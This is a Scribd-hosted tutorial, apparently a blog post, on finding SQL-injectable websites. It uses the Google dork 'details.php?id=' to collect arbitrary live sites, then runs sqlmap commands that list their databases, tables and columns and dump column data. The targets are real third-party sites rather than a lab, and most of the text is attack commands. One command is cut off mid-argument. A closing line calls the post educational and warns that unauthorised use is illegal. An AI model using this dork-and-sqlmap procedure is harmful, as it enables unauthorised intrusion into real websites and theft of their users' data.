Scribd
Upload
71 views

SQL Injection Dorks With Examples

Uploaded by

vermanitin00001
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
71 views

SQL Injection Dorks With Examples

Uploaded by

vermanitin00001
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 5

SQL injection Dorks with examples

Step 1:

Open your preferred web browser (I’m using Firefox).


Navigate to www.google.com.
Copy and paste the following dork into the search
bar: details.php?id=.
The search results will display websites with details.php?id= in
their url.
Open each site individually and verify that the dork is present
in their URLs.
Step 2:

Now that we have identified potential vulnerable sites using


Google dorks, we can proceed to test them for SQL injection
using a tool called sqlmap.
sqlmap is already in Kali Linux; however, if you don’t have it,
you can install it by running the following command:

sudo apt install sqlmap

Once the installation is complete, run the following command


to find SQL injection vulnerabilities using sqlmap:

sqlmap -u "put_the_URL_of_the_site+here" --dbs


Sqlmap will test each parameter in the URL for SQL injection
and provide the database type along with a list of databases.

Step 3:

Once the SQL injection vulnerability has been successfully


identified and exploited, you can leverage additional flags in
conjunction with sqlmap to glean further insights about the
underlying database. eg What databases are presents, the
number of tables they have etc.

For example:

To find the number of tables in a specific database, use the


command:

sqlmap -u "<URL of the site>" -D <database name> --tables


To determine the names of the columns in a particular table,
use:

sqlmap -u "put_the_URL_of_the_site+here" -D <database name> -T


<table name> --columns
To retrieve the data from a specific column, use:

sqlmap -u "put_the_URL_of_the_site+here" -D <database name> -T


<table name> -C <c

By following these steps, you will be able to leverage Google


dorks and sqlmap to identify and exploit SQL injection
vulnerabilities, gaining access to the underlying databases and
extracting valuable information. However, it’s crucial to note
that performing these actions on websites without permission
is illegal and unethical. This blog post aims to provide
knowledge and raise awareness about SQL injection
vulnerabilities for educational purposes only.

You might also like